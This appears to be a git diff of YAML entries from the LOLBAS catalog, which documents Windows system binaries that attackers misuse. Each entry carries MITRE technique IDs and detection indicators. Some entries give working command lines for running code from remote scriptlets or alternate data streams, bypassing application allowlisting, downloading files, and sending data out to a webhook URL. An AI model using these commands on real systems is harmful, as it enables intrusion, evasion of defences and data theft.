|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
- Path: C:\Windows\SysWOW64\bash.exe
|
- Path: C:\Windows\SysWOW64\bash.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
@ -50,4 +50,4 @@ Acknowledgement:
|
|||||||
Handle: '@aionescu'
|
Handle: '@aionescu'
|
||||||
- Person: Asif Matadar
|
- Person: Asif Matadar
|
||||||
Handle: '@d1r4c'
|
Handle: '@d1r4c'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Bitsadmin.exe
|
Name: Bitsadmin.exe
|
||||||
Description: Used for managing background intelligent transfer
|
Description: Used for managing background intelligent transfer
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
@ -56,4 +56,4 @@ Acknowledgement:
|
|||||||
Handle: '@carnal0wnage'
|
Handle: '@carnal0wnage'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
28
yml/OSBinaries/Certoc.yml
Normal file
28
yml/OSBinaries/Certoc.yml
Normal file
@ -0,0 +1,28 @@
|
|||||||
|
---
|
||||||
|
Name: CertOC.exe
|
||||||
|
Description: Used for installing certificates
|
||||||
|
Author: 'Ensar Samil'
|
||||||
|
Created: '2021-10-07'
|
||||||
|
Commands:
|
||||||
|
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
|
||||||
|
Description: Loads the target DLL file
|
||||||
|
Usecase: Execute code within DLL file
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows Server 2022
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\certoc.exe
|
||||||
|
- Path: c:\windows\syswow64\certoc.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Process creation with given parameter
|
||||||
|
- IOC: Unsigned DLL load via certoc.exe
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Ensar Samil
|
||||||
|
Handle: '@sblmsrsn'
|
||||||
|
---
|
@ -2,7 +2,7 @@
|
|||||||
Name: CertReq.exe
|
Name: CertReq.exe
|
||||||
Description: Used for requesting and managing certificates
|
Description: Used for requesting and managing certificates
|
||||||
Author: 'David Middlehurst'
|
Author: 'David Middlehurst'
|
||||||
Created: '2020-07-07'
|
Created: 2020-07-07
|
||||||
Commands:
|
Commands:
|
||||||
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||||
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certreq.exe
|
- Path: C:\Windows\System32\certreq.exe
|
||||||
- Path: C:\Windows\SysWOW64\certreq.exe
|
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: certreq creates new files
|
- IOC: certreq creates new files
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Certutil.exe
|
Name: Certutil.exe
|
||||||
Description: Windows binary used for handling certificates
|
Description: Windows binary used for handling certificates
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||||
Description: Download and save 7zip to disk in the current folder.
|
Description: Download and save 7zip to disk in the current folder.
|
||||||
@ -44,7 +44,7 @@ Commands:
|
|||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||||
Usecase: Decode files to evade defensive measures
|
Usecase: Decode files to evade defensive measures
|
||||||
Category: Decode
|
Category: Decode
|
||||||
@ -55,7 +55,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cmd.exe
|
Name: Cmd.exe
|
||||||
Description: The command-line interpreter in Windows
|
Description: The command-line interpreter in Windows
|
||||||
Author: 'Ye Yint Min Thu Htut'
|
Author: 'Ye Yint Min Thu Htut'
|
||||||
Created: '2019-06-26'
|
Created: 2019-06-26
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||||
Description: Add content to an Alternate Data Stream (ADS).
|
Description: Add content to an Alternate Data Stream (ADS).
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmd.exe
|
- Path: C:\Windows\System32\cmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: cmd.exe executing files from alternate data streams.
|
- IOC: cmd.exe executing files from alternate data streams.
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Cmdkey.exe
|
Name: Cmdkey.exe
|
||||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmdkey /list
|
- Command: cmdkey /list
|
||||||
Description: List cached credentials
|
Description: List cached credentials
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdkey.exe
|
- Path: C:\Windows\System32\cmdkey.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usage of this command could be an IOC
|
- IOC: Usage of this command could be an IOC
|
||||||
@ -23,6 +23,6 @@ Resources:
|
|||||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
26
yml/OSBinaries/Cmdl32.yml
Normal file
26
yml/OSBinaries/Cmdl32.yml
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
---
|
||||||
|
Name: cmdl32.exe
|
||||||
|
Description: Microsoft Connection Manager Auto-Download
|
||||||
|
Author: 'Elliot Killick'
|
||||||
|
Created: '2021-08-26'
|
||||||
|
Commands:
|
||||||
|
- Command: cmdl32 /vpn /lan %cd%\config
|
||||||
|
Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.
|
||||||
|
Usecase: Download file from Internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\cmdl32.exe
|
||||||
|
- Path: C:\Windows\SysWOW64\cmdl32.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: Reports of downloading from suspicious URLs in %TMP%\config.log
|
||||||
|
- IOC: Useragent Microsoft(R) Connection Manager Vpn File Update
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Elliot Killick
|
||||||
|
Handle: '@elliotkillick'
|
||||||
|
---
|
@ -2,11 +2,11 @@
|
|||||||
Name: Cmstp.exe
|
Name: Cmstp.exe
|
||||||
Description: Installs or removes a Connection Manager service profile.
|
Description: Installs or removes a Connection Manager service profile.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1191
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||||
Category: AwL bypass
|
Category: AwL bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1191
|
MitreID: T1191
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmstp.exe
|
- Path: C:\Windows\System32\cmstp.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||||
@ -40,4 +40,4 @@ Acknowledgement:
|
|||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
- Person: Nick Tyrer
|
- Person: Nick Tyrer
|
||||||
Handle: '@NickTyrer'
|
Handle: '@NickTyrer'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: ConfigSecurityPolicy.exe
|
Name: ConfigSecurityPolicy.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||||
Author: 'Ialle Teixeira'
|
Author: 'Ialle Teixeira'
|
||||||
Created: '04/09/2020'
|
Created: 2020-09-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||||
Description: Upload file, credentials or data exfiltration in general
|
Description: Upload file, credentials or data exfiltration in general
|
||||||
@ -14,9 +14,9 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||||
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Control.exe
|
Name: Control.exe
|
||||||
Description: Binary used to launch controlpanel items in Windows
|
Description: Binary used to launch controlpanel items in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\control.exe
|
- Path: C:\Windows\System32\control.exe
|
||||||
- Path: C:\Windows\SysWOW64\control.exe
|
- Path: C:\Windows\SysWOW64\control.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Control.exe executing files from alternate data streams.
|
- IOC: Control.exe executing files from alternate data streams.
|
||||||
@ -28,4 +28,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Csc.exe
|
Name: Csc.exe
|
||||||
Description: Binary file used by .NET to compile C# code
|
Description: Binary file used by .NET to compile C# code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: csc.exe -out:My.exe File.cs
|
- Command: csc.exe -out:My.exe File.cs
|
||||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||||
@ -23,13 +23,13 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person:
|
- Person:
|
||||||
Handle:
|
Handle:
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Cscript.exe
|
Name: Cscript.exe
|
||||||
Description: Binary used to execute scripts in Windows
|
Description: Binary used to execute scripts in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript c:\ads\file.txt:script.vbs
|
- Command: cscript c:\ads\file.txt:script.vbs
|
||||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cscript.exe
|
- Path: C:\Windows\System32\cscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Cscript.exe executing files from alternate data streams
|
- IOC: Cscript.exe executing files from alternate data streams
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Desktopimgdownldr.exe
|
Name: Desktopimgdownldr.exe
|
||||||
Description: Windows binary used to configure lockscreen/desktop image
|
Description: Windows binary used to configure lockscreen/desktop image
|
||||||
Author: Gal Kristal
|
Author: Gal Kristal
|
||||||
Created: 28/06/2020
|
Created: 2020-06-28
|
||||||
Commands:
|
Commands:
|
||||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||||
Description: Downloads the file and sets it as the computer's lockscreen
|
Description: Downloads the file and sets it as the computer's lockscreen
|
||||||
@ -14,9 +14,9 @@ Commands:
|
|||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Dfsvc.exe
|
Name: Dfsvc.exe
|
||||||
Description: ClickOnce engine in Windows used by .NET
|
Description: ClickOnce engine in Windows used by .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url
|
Description: Executes click-once-application from Url
|
||||||
Usecase: Use binary to bypass Application whitelisting
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
@ -17,14 +17,14 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,11 +2,11 @@
|
|||||||
Name: Diantz.exe
|
Name: Diantz.exe
|
||||||
Description: Binary that package existing files into a cabinet (.cab) file
|
Description: Binary that package existing files into a cabinet (.cab) file
|
||||||
Author: 'Tamir Yehuda'
|
Author: 'Tamir Yehuda'
|
||||||
Created: '08/08/2020'
|
Created: 2020-08-08
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||||
Usecase: Download and compress into a cab file.
|
Usecase: Download and compress into a cab file.
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -23,9 +23,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\diantz.exe
|
- Path: c:\windows\system32\diantz.exe
|
||||||
- Path: c:\windows\syswow64\diantz.exe
|
- Path: c:\windows\syswow64\diantz.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: diantz storing data into alternate data streams.
|
- IOC: diantz storing data into alternate data streams.
|
||||||
- IOC: diantz getting a file from a remote machine or the internet.
|
- IOC: diantz getting a file from a remote machine or the internet.
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Diskshadow.exe
|
Name: Diskshadow.exe
|
||||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from diskshadow.exe
|
- IOC: Child process from diskshadow.exe
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Dnscmd.exe
|
Name: Dnscmd.exe
|
||||||
Description: A command-line interface for managing DNS servers
|
Description: A command-line interface for managing DNS servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
